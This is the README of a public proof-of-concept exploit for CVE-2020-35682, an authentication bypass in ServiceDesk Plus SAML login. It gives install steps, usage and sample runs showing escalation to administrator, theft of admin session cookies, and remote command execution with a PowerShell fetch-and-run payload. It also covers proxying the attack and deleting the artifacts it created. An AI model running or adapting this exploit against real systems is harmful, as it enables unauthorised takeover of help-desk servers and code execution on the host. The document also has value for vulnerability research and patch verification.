
SD-91948: CVE-2020-35682: Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus.

Primary LanguagePythonMIT LicenseMIT


SD-91948: CVE-2020-35682: Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus. (As described by ManageEngine). If the target ServiceDesk Plus (<11134) installation has SAML login enabled and you have credentials to a low privilege user then you can escalate to administrator and gain RCE.

I decided to release this POC since there is neither any public exploit nor much description available for exploiting said bug. The code is quite messy but it works.


git clone https://github.com/its-arun/CVE-2020-35682.git
cd CVE-2020-35682
pip3 install -r requirements.txt
chmod +x exploit.py


└──╼ $./exploit.py -h
usage: exploit.py [-h] -u URL -e EMAIL -p PASSWORD -d DOMAIN [-x PAYLOAD] [-a ADMINUSERNAME]

CVE-2020-35682 : Authentication Bypass Vulnerability during SAML login in ServiceDesk Plus

optional arguments:
  -h, --help            show this help message and exit
  -x PAYLOAD, --payload PAYLOAD
                        Payload to execute on target, eg: "powershell iex(iwr
                        Admin Username, default: administrator

required named arguments:
  -u URL, --url URL     ServiceDesk Plus installation url, eg. https://tenet.local/sdp
  -e EMAIL, --email EMAIL
                        User E-mail for SAML Login, eg: chris@tenent.local
  -p PASSWORD, --password PASSWORD
                        User Password for SAML Login
  -d DOMAIN, --domain DOMAIN
                        Domain, eg: TENET

Get Administrator Cookie

└──╼ $./exploit.py -u "https://tenet.local/sdp" -e 'chris@tenet.local' -p 'P@ssw0rd' -d "TENET"
[+] Created session as administrator.
[+] Use following cookies to login as administrator
	=[COOKIE NAME]=                =[COOKIE VALUE]=              
	JSESSIONIDSSO                  E1D80C738E12085360A789109D43A233
	PORTALID                       1                             
	SDPSESSIONID                   918B7C63186055F72EAD2DEAC34B4CA9

Execute command on target

└──╼ $./exploit.py -u "https://tenet.local/sdp" -e 'chris@tenet.local' -p 'P@ssw0rd' -d "TENET" -x "powershell iex(iwr -usebasicparsing)"
[+] Created session as administrator.
[+] Use following cookies to login as administrator
	=[COOKIE NAME]=                =[COOKIE VALUE]=              
	JSESSIONIDSSO                  2316433DF39DFFE8ACD4E1DDD759D259
	PORTALID                       1                             
	SDPSESSIONID                   666788540DB6329CB7E59E1E96FF30EB
[+] Created custom trigger ADQRYN11WA6KEXIQ
[+] Created Request to trigger custom action ADQRYN11WA6KEXIQ
[+] Executed "powershell iex(iwr -usebasicparsing)" on "https://tenet.local/sdp"
[+] Deleted Request ADQRYN11WA6KEXIQ
[+] Deleted Custom Action ADQRYN11WA6KEXIQ

Using with proxy

Proxies can be defined on line 9 in exploit.py in following format

proxies = {'http': 'socks4://','https': 'socks4://'}

Or you can set proxy as environment variable if you don't wish to edit source

export HTTP_PROXY="socks4://"
export HTTPS_PROXY="socks4://"

Make sure to unset these variables after running exploit.